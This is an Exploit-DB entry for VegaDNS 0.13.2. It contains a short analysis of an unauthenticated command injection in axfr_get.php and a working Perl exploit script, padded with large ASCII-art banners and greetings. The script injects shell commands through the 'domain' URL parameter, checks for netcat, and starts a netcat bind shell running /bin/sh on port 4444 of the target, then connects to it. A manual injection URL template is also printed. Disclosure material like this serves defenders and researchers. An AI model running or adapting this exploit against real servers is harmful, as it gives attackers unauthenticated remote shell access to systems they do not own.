VegaDNS 0.13.2 - Remote Command Injection

EDB-ID:

40402

CVE:

N/A


Platform:

PHP

Published:

2016-09-20

#!/usr/bin/perl
                                                                                                                                                                       $izd= qq{
  ██╗███████╗██╗   ██╗███╗   ██╗ █████╗     ██████╗ ██████╗  ██████╗ ██████╗
  ██║╚══███╔╝██║   ██║████╗  ██║██╔══██╗    ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
  ██║  ███╔╝ ██║   ██║██╔██╗ ██║███████║    ██║  ██║██████╔╝██║   ██║██████╔╝
  ██║ ███╔╝  ██║   ██║██║╚██╗██║██╔══██║    ██║  ██║██╔══██╗██║   ██║██╔═══╝
  ██║███████╗╚██████╔╝██║ ╚████║██║  ██║    ██████╔╝██║  ██║╚██████╔╝██║
  ╚═╝╚══════╝ ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝    ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚═╝
                                                                                                                                                                       };$vg=qq{
         ▀  ▐░░▄                    ▄▄▄▄▄▄▄
     ▀▀  ▄░  ▐▀▄▀▄              ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
 ▀▀▀ ▐▄▄░  ▀▐▄ ▄▀▄ ▄         ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
        ▀ ▄  ▐▀▄  ▀▄░       ▄▄░░      ▀▓▓▓▓▓▓▓▓▓▌
             ▐▀▄▀▄  ▀▀▄▀▄   ▓▌░░     ▄▄▐▓▀▓▓░▀▓▓▓▌
              ▀▄▀▄▀▄░ ▐▀▄▀▄  ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄      ▄▄▄▓▓▓▓▄▄▄
                ▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓       ░░ ▒░░   ▀▀▒▒▒▓▓▒░░░    ░░▒▒▄
                  ▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄      ▒░▒░░      ░░▒░           ░░▓
                    ▐▄ ░░░ ░▒░░▒▌ █▄▒░▄  ▄▓▒░  ▐░░ ░░░▒░             ░░
                   ▓▓░▄▓ ░▒░  ░░▐▓  ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░   ░      ░░░░
                    ▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░   ░░▒▒▒░▒
                         █░░  ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
                     ▐▒▒▒  █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░  ░ ░░▒░░░  ░▒
                 ▓▒░░▐▒░ ░▓  ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░     ░░░░▒▄░░▒░░    ░▒
                ▓▒ ░▒▒▒█ ░▒▓  ▐▒▓░▒▒░  ▐░░ ▀▒▒▒░░░   ░   ▐░░▒▒▒     ░ ░
               █░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░   ░    ░░░░░    ░░▒▒▒    ░   ▒▒
                ▀▓▓▀░▓▌▒░▒  ░▒▓▓▓▒▒▒░░░░         ░    ░░▒▒░  ░      ░░▒
                  ▀▀▓▓▌▀░  ░ ░▐▓▓▓▒▓▓▓▄░░░▄     ▐░░░▒▒▒▀ ▐░▒▄░    ▐░░░▒
                      ▐▒▒░░▄▓▓░▌  ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░   ░░▒▒▒▓
                       ▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
                         ▓▒░░░▄   ░░▒▓▀       ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
                          ▀▓▄▒▒▒░░░▒▓          ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
                             ▀▀▀▀  ▀           ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
                                             ▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░     ▒
                                            ▓▒▒▓▌░░░░░░░▒▌░░░░ ░   ░  ▀  ░▄
                                           ▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀   ░░░   ░░░▒▌
                                          ▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄  ░░░░░▐░
                                      ▄▐█▒  ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀   ▀  ░░▒▌
                                  ▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░   ░    ░  ▒▒█▀
                               ▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌    ░  ▐░ ░  ░▒
                             ▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░   ░   ▐░░░  ░█
                          ▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌   ░   ▐░░░ ░░▒
                      ▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░      ░░░░ ░░▒
                   ▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░      ░░░░  ░░
                  ▄▒░░░░   ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░  ░  ░░░░  ░░▒
                  ▒░░░░░░▒▒▓▓▓▓▓▓▓█    ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░  ░ ░░░░  ▐▒▌
                 ▒▀░░░▒░░▓▒▓▓▓▓▓▌▀     ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░  ░▒▌
                 ▓ ░▒░░░▀▀▒▓▓▓▓▓▌      ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
                ▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌           ▀▓▓▓▓▓▓▓▓▒░  ░░░ ░▄░▒▓▌
                 ░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀                   ▒░      ░ ░░▓▓▄
                 ░        ▓                        ▓▒░       ░░▒▀▒░▒▄
                ▄     ░  ▀                          ▓▒░░▄░░░░░▀░░░▌░░▒
                ░     ▄▄▀                            ▀▒▒▒▒▒▄ ▄░░░░  ▀▀
                     ░░░                              ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
               ░   ░▀░░                               ▀▀▒▒▒▒▀       ▀▒ ▄
         ▄▄▄▄▄▄   ▄▀▒▓▌▄                                   ▀▄        ░ ░
         ▓▓▓▓▌▄  ▄▓▓▓▓▓▓▓                                    ▒ ▄      ░ ▄
         ▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓                                       ░    ▀▓ ▄
         ▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀                                          ░   ▀▄░▒▌▄▄
     ▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀                                            ▄▓▄▄▄▄▄▒▓▓▓▓▄
 ▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█                                               ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█                                                  ▐▓░░░▒▓▓▓▓▒▓▓
                                                                  ▐▓▓░▒▓▓▓▓▓▓▓
                                                                  ▐▓▓▓▓▓▓▒▒▓▌
                                                              ▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
                                                             ██▒░░░░░░░▓▓███

                                                                                                                                                                        };$b=qq{
  ██╗   ██╗███████╗ ██████╗  █████╗ ██████╗ ███╗   ██╗███████╗
  ██║   ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗  ██║██╔════╝
  ██║   ██║█████╗  ██║  ███╗███████║██║  ██║██╔██╗ ██║███████╗
  ╚██╗ ██╔╝██╔══╝  ██║   ██║██╔══██║██║  ██║██║╚██╗██║╚════██║
   ╚████╔╝ ███████╗╚██████╔╝██║  ██║██████╔╝██║ ╚████║███████║
    ╚═══╝  ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═══╝╚══════╝


  ██████╗ ███████╗███╗   ███╗ ██████╗ ████████╗███████╗
  ██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
  ██████╔╝█████╗  ██╔████╔██║██║   ██║   ██║   █████╗
  ██╔══██╗██╔══╝  ██║╚██╔╝██║██║   ██║   ██║   ██╔══╝
  ██║  ██║███████╗██║ ╚═╝ ██║╚██████╔╝   ██║   ███████╗
  ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝    ╚═╝   ╚══════╝


  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗    ██████╗ ██╗   ██╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝    ██╔══██╗╚██╗ ██╔╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║       ██████╔╝ ╚████╔╝
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║       ██╔══██╗  ╚██╔╝
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║       ██████╔╝   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝       ╚═════╝    ╚═╝


                                         ▄
                                  ▄█▀      ▀█▄▄
                             ▄▄▓▀▀             ▀▓▄▄
                          ▄▓▓▀                    ▀█▓▄
                       ▄▓▓▀                          ▀▓▓▓▄
                    ▄▓▓█▀                               ▀▓▓▄▄
                 ▄▓▓▓▀                                    ▀▓▓▓▄
               ▄▓▓▓▀                                        ▀▓▓▓▓
             ▓▓▓▓▀                                            ▀▓▓▓▓▄
           ▓▓▓▓█                                                ▀▓▓▓▓
          ▐▓▓▓▀                                                   ▓▓▓▌
           ▓▓▓▌                                                  ▐▓▓▓
            ▓▓▓▌                                                ▄▓▓▓
             ▓▓▓▓                                              ▄▓▓▓
              ▓▓▓▓▓▓▓▓▓▓██                            ██▓▓▓▓▓▓▓▓▓▓
               ▀▀▀▀      ▄▄▄▄▄▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄▄▄       ▀▀█
                ▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀   ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
            ▄▓▓▓▓█▀▀▀              ▓▓█    ▐▓▓              ▀▀▀█▓▓▓▓▓
             ▓▓▓                  ▐▓█      ▀▓▌                  ▓▓▓
              █▓▌                 ▓▀    ▌   ▀▓                 ▐▓▓
               ▀▓  ▄          ▄▀ ▐   ▌ ▓▓ ▐▄  █ ▀▓▄         ▄▌ ▓▀
                 █ ▀▓▄     ▄▓█     ▄▓ ▐▓▓▌ █▓     ▀▓▄▄    ▄▓▀ ▓
              ▄▌     █▓▓▓▓▓▀      ▓▓▓▄▓▌▐▓▄▄▓▓      ▀▓▓▓▄▓▓▀    ▐▄
             ▓▓        █▀▀                             ▀█▀       ▀▓
            ▓▓           ▄  ▄▀                     ▄   ▄          ▓▓
           ▓▓▓▄       ▄▓▀ ▄█    ▄              ▄    ▀▄ ▀▓▄        ▓▓▓
          ████▀▀▀▀▀▀▀▀▀  ▓▀  ▄ ▄                ▓ █   ▓  ▀▀▀▀▀▀▀▀▀████
                       ▄▓▀  ▓ ▄▌▐     ▐  ▌     ▌▐▓ ▓   ▓▄
                      ▄▓ ▄▄▓▌▐▓ ▐   ▓ ▓  ▓ ▐▄  ▌ ▓▌▐▓▄▄ ▓▓
                     ▓▓▓█▀▀  ▀█▓▓▌ ▓ ▐▓  █▌ ▓  ▓▓█▀  ▀▀█▓▓▓
                    █▀          ▀ ▐▓▄▓▌  ▐▓▄▓▌ ▀          ▀█
                                     ▀    ▀▀


         ___ .___ .______  ._______._____  .___.__  ._______  .____     .___
.___    |   |: __|: __   \ : .____/:_ ___\ :   |  \ : .___  \ |    |___ |   |
:   | /\|   || : ||  \____|| : _/\ |   |___|   :   || :   |  ||    |   ||   |
|   |/  :   ||   ||   :  \ |   /  \|   /  ||   .   ||     :  ||    :   ||   |/\
|   /       ||   ||   |___\|_.: __/|. __  ||___|   | \_. ___/ |        ||   /  \
|______/|___||___||___|       :/    :/ |. |    |___|   :/     |. _____/ |______/
        :                           :   :/             :       :/
        :                               :                      :

                                                                                                                                                                        };$g=qq{

   ██████╗ ██████╗ ███████╗███████╗████████╗███████╗
  ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
  ██║  ███╗██████╔╝█████╗  █████╗     ██║     ███╔╝
  ██║   ██║██╔══██╗██╔══╝  ██╔══╝     ██║    ███╔╝
  ╚██████╔╝██║  ██║███████╗███████╗   ██║   ███████╗
   ╚═════╝ ╚═╝  ╚═╝╚══════╝╚══════╝   ╚═╝   ╚══════╝

To all the people with mad skills who share their knowledge:

  TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
  mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
  lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
  laughing_mantis, g0tm1k, nmrc, and many many more....

                                                                                                                                                                        };$a=qq^

   █████╗ ███╗   ██╗ █████╗ ██╗  ██╗   ██╗███████╗██╗███████╗
  ██╔══██╗████╗  ██║██╔══██╗██║  ╚██╗ ██╔╝██╔════╝██║██╔════╝
  ███████║██╔██╗ ██║███████║██║   ╚████╔╝ ███████╗██║███████╗
  ██╔══██║██║╚██╗██║██╔══██║██║    ╚██╔╝  ╚════██║██║╚════██║
  ██║  ██║██║ ╚████║██║  ██║███████╗██║   ███████║██║███████║
  ╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝╚═╝   ╚══════╝╚═╝╚══════╝l

VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org


The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.

The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.

---------------------------cut---------------------------
 * NOTE:
 *          This functionality ONLY exists outside of the main application
 *          because tcplient kept dying fatally due to file descriptor 7
 *          being unavailable, which only occurs AFTER session_start() is
 *          called.
 *
 */
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
    echo "ERROR: no hostname given\n";
    exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
    echo "ERROR: no domain was supplied\n";
    exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------

  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝
                                                                                                                                                                              ^;

print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print "  "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print "  . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
    print "  ! ! ! netcat not found! Manual exploitation required:\n";
    print "        $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
    exit 1;
}
print "  . . . netcat found: $z\n";
print "  . . . Performing IZUNA DROP!\n";
#  ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print "      ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print "  . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;